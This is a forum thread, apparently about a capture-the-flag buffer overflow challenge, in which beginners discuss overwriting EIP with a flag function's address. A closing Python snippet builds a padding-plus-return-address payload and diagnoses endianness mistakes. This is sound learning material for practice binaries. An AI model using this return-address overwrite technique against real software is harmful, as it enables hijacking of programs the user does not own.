0xDiablos bad characters?

Doing my first ever BOF and I need a nudge. I've found the offset for the EIP. My strategy at this point is to overwrite it with the address of the flag function. The problem is that I can overwrite it with stuff like "AAAA" or "BBCC" but as soon as I try to put in the correct hex for the return address, I get garbage in the EIP. I suspect some kind of "bad character" issue, but maybe I'm totally going down the wrong path. Am I off base here? Thanks for any help. I'm not very good at asking for it.

Comments

  • I have the same problem here, I was looking for help

  • You can send them via echo -e "...\xFF" and you'll jump to the function. I can jump to the specific function and run it, but only locally. I'm having trouble sending the payload to the server.

  • Don't forget to take into account the little-endianness of the architecture when writing your payload. If what you have in the EIP is backwards then that's the problem.

  • Yah. It's always the endianness that gets me on those too. Even when I remember it, I will do something silly like reverse the whole thing. Hehe.


  • edited September 3
    I'm essentially having the same issue. Unfortunately, this type of attack is new to me, so sorry if I sound like a muppet.

    I've found the offset and the address of the flag function. I've used python pwn to convert the address to the p32 value and as I increase the offset I can see it referenced then on the last offset increase suddenly the value changes completely. Bit baffled.
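An added illustration (not from any of the posters above) of the endianness point made in the thread: the same 4 bytes read back as a different EIP value depending on the order you wrote them, and a text string like "\x08\x04..." sent without interpretation is not the address at all. OFFSET and FLAG_ADDR are constructed placeholders, not values from the challenge.

```python
import struct

# Constructed, hypothetical values: the real offset and flag-function address
# come from your own debugging of the binary, not from this thread.
OFFSET = 188
FLAG_ADDR = 0x08049157


def p32(value: int) -> bytes:
    """Pack a 32-bit value little-endian, as pwntools' p32() does for x86."""
    return struct.pack("<I", value)


def u32(data: bytes) -> int:
    """Interpret 4 bytes the way an x86 CPU does when it pops them into EIP."""
    return struct.unpack("<I", data)[0]


def build_payload(offset: int, ret_addr: int) -> bytes:
    """Padding up to the saved return address, then the packed address."""
    return b"A" * offset + p32(ret_addr)


def eip_after_overflow(payload: bytes, offset: int) -> int:
    """The value that would land in EIP from the 4 bytes at `offset`."""
    saved = payload[offset:offset + 4]
    if len(saved) < 4:
        raise ValueError("payload does not reach the saved return address")
    return u32(saved)


def diagnose(payload: bytes, offset: int, intended: int) -> str:
    """Compare the EIP a payload would produce with the intended address
    and name the usual mistake when they differ."""
    try:
        eip = eip_after_overflow(payload, offset)
    except ValueError:
        return "short"
    saved = payload[offset:offset + 4]
    if eip == intended:
        return "ok"
    if saved == struct.pack(">I", intended):
        return "reversed"          # address written in human reading order
    if saved.startswith(b"\\x"):
        return "escaped-text"      # the literal characters \x.. were sent
    return "unexpected"
```

Feed `diagnose()` the exact bytes you send and the offset you measured; "reversed" and "escaped-text" are the two outcomes that look like "bad characters" but are not.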